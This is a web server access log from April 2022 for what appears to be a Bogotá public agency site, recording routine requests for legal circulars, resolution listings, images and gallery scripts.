172.22.2.4 - - [13/Apr/2022:22:18:24 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [13/Apr/2022:22:18:24 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [13/Apr/2022:22:18:24 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [13/Apr/2022:22:18:24 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [13/Apr/2022:22:18:25 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [13/Apr/2022:22:18:25 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [13/Apr/2022:22:18:25 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [13/Apr/2022:22:18:25 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [13/Apr/2022:22:18:25 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [13/Apr/2022:22:18:25 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [13/Apr/2022:22:18:25 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
31.13.127.22 - - [13/Apr/2022:22:19:42 -0500] "GET /images/estacion-monitoreo-usme-29-marzo.jpg HTTP/1.1" 200 30383
207.46.13.157 - - [13/Apr/2022:22:20:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
69.171.251.14 - - [13/Apr/2022:22:21:31 -0500] "GET /en-bolsas-rojas-no-se-depositan-residuos-ordinarios-solo-infecciosos-o-similares.html?fbclid=IwAR1062U0MCcsa-YfJg6SaTExTlqi56KqGipTkVsOHX-xIh-ejRXopE05em8 HTTP/1.1" 200 1094
40.77.167.46 - - [13/Apr/2022:22:21:34 -0500] "GET /bla/resoluciones/resoluciones%202016/2405.pdf HTTP/1.1" 200 486694
216.245.221.92 - - [13/Apr/2022:22:22:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:21:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/Apr/2022:22:22:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45251
172.22.2.4 - - [13/Apr/2022:22:22:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
201.245.192.253 - - [13/Apr/2022:22:23:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45751
34.147.6.219 - - [13/Apr/2022:22:25:09 -0500] "GET / HTTP/1.1" 200 319
40.77.167.28 - - [13/Apr/2022:22:25:17 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
191.89.243.55 - - [13/Apr/2022:22:25:22 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 274821
172.22.2.4 - - [13/Apr/2022:22:26:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [13/Apr/2022:22:26:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:50 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:50 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:50 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:50 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:50 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:50 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:50 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:51 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Apr/2022:22:26:51 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
216.245.221.92 - - [13/Apr/2022:22:27:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:27:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.237.58.219 - - [13/Apr/2022:22:29:41 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
172.22.2.4 - - [13/Apr/2022:22:28:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
173.252.83.24 - - [13/Apr/2022:22:31:01 -0500] "GET /images/JBB1.jpeg HTTP/1.1" 200 90628
216.245.221.92 - - [13/Apr/2022:22:32:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [13/Apr/2022:22:32:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45251
201.245.192.253 - - [13/Apr/2022:22:33:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45751
172.22.2.4 - - [13/Apr/2022:22:33:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:34:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
172.22.2.4 - - [13/Apr/2022:22:36:09 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 304 -
117.148.130.28 - - [13/Apr/2022:22:36:30 -0500] "HEAD /galeria/galeria/fotos/GuaymaralTorca4P.jpg HTTP/1.1" 200 -
181.177.34.17 - - [13/Apr/2022:22:37:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.177.34.17 - - [13/Apr/2022:22:37:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.177.34.17 - - [13/Apr/2022:22:37:14 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [13/Apr/2022:22:37:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:36:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63342
181.50.84.140 - - [13/Apr/2022:22:37:48 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.50.84.140 - - [13/Apr/2022:22:37:48 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.50.84.140 - - [13/Apr/2022:22:37:48 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.50.84.140 - - [13/Apr/2022:22:37:48 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
181.50.84.140 - - [13/Apr/2022:22:37:48 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
181.50.84.140 - - [13/Apr/2022:22:37:48 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
181.50.84.140 - - [13/Apr/2022:22:37:49 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
181.50.84.140 - - [13/Apr/2022:22:37:50 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
181.50.84.140 - - [13/Apr/2022:22:37:50 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
181.50.84.140 - - [13/Apr/2022:22:37:50 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
181.50.84.140 - - [13/Apr/2022:22:37:51 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
172.22.2.4 - - [13/Apr/2022:22:39:45 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [13/Apr/2022:22:39:48 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 200 320793
172.22.2.4 - - [13/Apr/2022:22:39:54 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [13/Apr/2022:22:39:59 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 249615
172.22.2.4 - - [13/Apr/2022:22:40:06 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
172.22.2.4 - - [13/Apr/2022:22:40:13 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
172.22.2.4 - - [13/Apr/2022:22:40:20 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
172.22.2.4 - - [13/Apr/2022:22:40:28 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000014%20del%2001%20de%20septiembre%20del%202020.pdf HTTP/1.1" 200 320826
172.22.2.4 - - [13/Apr/2022:22:40:38 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
172.22.2.4 - - [13/Apr/2022:22:40:45 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
172.22.2.4 - - [13/Apr/2022:22:39:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:40:54 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [13/Apr/2022:22:40:59 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
172.22.2.4 - - [13/Apr/2022:22:41:02 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 200 164676
172.22.2.4 - - [13/Apr/2022:22:41:07 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 200 145170
172.22.2.4 - - [13/Apr/2022:22:41:12 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
172.22.2.4 - - [13/Apr/2022:22:41:16 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [13/Apr/2022:22:41:18 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
172.22.2.4 - - [13/Apr/2022:22:41:23 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
172.22.2.4 - - [13/Apr/2022:22:41:27 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%200015%20del%207%20de%20Diciembre%20de%202018.pdf HTTP/1.1" 200 165305
172.22.2.4 - - [13/Apr/2022:22:41:32 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
172.22.2.4 - - [13/Apr/2022:22:40:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
172.22.2.4 - - [13/Apr/2022:22:41:43 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 200 152575
172.22.2.4 - - [13/Apr/2022:22:41:48 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
172.22.2.4 - - [13/Apr/2022:22:41:54 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 309906
172.22.2.4 - - [13/Apr/2022:22:42:00 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
103.178.237.132 - - [13/Apr/2022:22:42:01 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [13/Apr/2022:22:42:07 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [13/Apr/2022:22:42:17 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
172.22.2.4 - - [13/Apr/2022:22:42:21 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
181.237.58.219 - - [13/Apr/2022:22:42:24 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
172.22.2.4 - - [13/Apr/2022:22:42:25 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 200 143376
172.22.2.4 - - [13/Apr/2022:22:42:27 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20c-595-2010.doc HTTP/1.1" 200 39424
216.245.221.92 - - [13/Apr/2022:22:42:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:42:34 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
172.22.2.4 - - [13/Apr/2022:22:42:38 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
172.22.2.4 - - [13/Apr/2022:22:42:44 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [13/Apr/2022:22:42:50 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
172.22.2.4 - - [13/Apr/2022:22:43:07 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
181.237.58.219 - - [13/Apr/2022:22:43:09 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
172.22.2.4 - - [13/Apr/2022:22:43:13 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
172.22.2.4 - - [13/Apr/2022:22:43:19 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 200 93580
172.22.2.4 - - [13/Apr/2022:22:43:24 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
201.245.192.253 - - [13/Apr/2022:22:42:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45251
172.22.2.4 - - [13/Apr/2022:22:43:28 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%201%20del%2014%20de%20enero%20de%202013.pdf HTTP/1.1" 200 1298384
172.22.2.4 - - [13/Apr/2022:22:43:33 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1402289
172.22.2.4 - - [13/Apr/2022:22:43:41 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%208%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 963197
172.22.2.4 - - [13/Apr/2022:22:43:50 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
201.245.192.253 - - [13/Apr/2022:22:43:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45751
40.77.167.41 - - [13/Apr/2022:22:44:30 -0500] "GET /portaldeninos/2021/04/28/dia-internacional-de-concienciacion-sobre-el-ruido-por-una-ciudad-mas-tranquila-y-sostenible/ HTTP/1.1" 200 102727
172.22.2.4 - - [13/Apr/2022:22:44:56 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%206%20del%2025%20de%20Mayo%20de%202012.pdf HTTP/1.1" 200 387391
172.22.2.4 - - [13/Apr/2022:22:45:02 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%205%20del%2027%20de%20Abril%20de%202012.pdf HTTP/1.1" 200 216613
172.22.2.4 - - [13/Apr/2022:22:45:09 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 200 253045
172.22.2.4 - - [13/Apr/2022:22:45:16 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%203%20del%2023%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 572950
172.22.2.4 - - [13/Apr/2022:22:45:22 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%202%20del%2014%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 113666
172.22.2.4 - - [13/Apr/2022:22:45:28 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2016%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 381186
172.22.2.4 - - [13/Apr/2022:22:45:33 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2015%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 486506
172.22.2.4 - - [13/Apr/2022:22:45:39 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [13/Apr/2022:22:45:49 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
172.22.2.4 - - [13/Apr/2022:22:45:55 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
172.22.2.4 - - [13/Apr/2022:22:46:11 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
172.22.2.4 - - [13/Apr/2022:22:46:17 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [13/Apr/2022:22:46:20 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
172.22.2.4 - - [13/Apr/2022:22:46:27 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 200 1118749
172.22.2.4 - - [13/Apr/2022:22:46:34 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%209%20del%2003%20de%20Noviembre%20de%202011.pdf HTTP/1.1" 200 54568
172.22.2.4 - - [13/Apr/2022:22:46:39 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
172.22.2.4 - - [13/Apr/2022:22:45:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:46:48 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 1107785
172.22.2.4 - - [13/Apr/2022:22:46:53 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2015%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 314873
172.22.2.4 - - [13/Apr/2022:22:47:00 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
172.22.2.4 - - [13/Apr/2022:22:47:07 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 252800
172.22.2.4 - - [13/Apr/2022:22:47:17 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 1488992
172.22.2.4 - - [13/Apr/2022:22:47:28 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
172.22.2.4 - - [13/Apr/2022:22:45:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
172.22.2.4 - - [13/Apr/2022:22:47:33 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 399895
216.245.221.92 - - [13/Apr/2022:22:47:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Apr/2022:22:47:38 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 601047
172.22.2.4 - - [13/Apr/2022:22:47:44 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2023%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 1452758
172.22.2.4 - - [13/Apr/2022:22:47:49 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2016%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 346378
172.22.2.4 - - [13/Apr/2022:22:47:55 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2031%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 496778
172.22.2.4 - - [13/Apr/2022:22:48:01 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2026%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 644194
172.22.2.4 - - [13/Apr/2022:22:48:09 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2023%20de%20Febrero%20de%202011.pdf HTTP/1.1" 200 540140
172.22.2.4 - - [13/Apr/2022:22:48:16 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2012%20de%20Abril%20de%202011.pdf HTTP/1.1" 200 366269
172.22.2.4 - - [13/Apr/2022:22:48:23 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20003%20de%20Febrero%20de%202011.pdf HTTP/1.1" 200 224758
172.22.2.4 - - [13/Apr/2022:22:48:29 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 4657752
172.22.2.4 - - [13/Apr/2022:22:48:40 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2005%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 2146608
181.237.58.219 - - [13/Apr/2022:22:48:56 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
207.46.13.209 - - [13/Apr/2022:22:49:28 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [13/Apr/2022:22:50:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [13/Apr/2022:22:52:33 -0500] "HEAD / HTTP/1.1" 200 -
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
186.155.119.233 - - [13/Apr/2022:22:53:14 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [13/Apr/2022:22:51:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
186.155.119.233 - - [13/Apr/2022:22:53:22 -0500] "GET /catalogoisis/imagenes/limpiar2.gif HTTP/1.1" 200 589
186.155.119.233 - - [13/Apr/2022:22:53:30 -0500] "GET /catalogoisis/imagenes/aceptar2.gif HTTP/1.1" 200 586
207.46.13.157 - - [13/Apr/2022:22:54:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
190.84.119.83 - - [13/Apr/2022:22:54:40 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
